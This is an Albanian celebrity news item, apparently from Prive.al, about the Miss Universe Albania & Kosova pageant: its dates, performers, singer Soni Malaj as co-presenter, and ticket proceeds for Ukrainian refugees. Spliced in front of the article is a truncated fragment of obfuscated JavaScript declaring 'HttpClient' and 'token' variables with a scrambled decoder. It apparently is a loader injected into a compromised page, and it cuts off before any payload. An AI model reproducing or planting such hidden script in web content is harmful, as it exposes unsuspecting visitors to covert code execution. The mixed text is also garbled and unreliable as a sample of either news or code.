;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Edhe një këngëtare shqiptare vjen në rolin e prezantueses

By

Eventi i vitit i bukurisë shqiptare, Miss Universe Albania & Kosova vjen edhe këtë vit me dy netë LIVE.

Gjysmëfinalja do të mbahet me datë 9 qershor në Venom Club, kurse finalja të nesermen në Pallatin e Kongreseve në Tiranë.

Mes të ftuarve të shumë për të performuar do jenë emra si: Manjola Ballbani, Capital T, Anxhela Peristeri, Gena, Valon Shehu, Marsela Çibukaj.

Por, ajo që ka lënë më së shumti përshtypje është fakti se (edhe) një këngëtare e njohur do të vijë në rolin e prezantueses.

Bëhet fjalë për këngëtaren Soni Malaj e cila do të jetë në moderim krah Teni Vllacaj.

E ftuar speciale e eventit është Miss Universe Ukraina 2021, Hana Nepliakh.

Të gjitha biletat do të shkojnë në ndihmë të refugjatëve ukrainas teksa eventi do të transmetohet LIVE dhe ekskluzivisht për Kosovë në Klan Kosova. /Prive.al

Artikuj të ngjashëm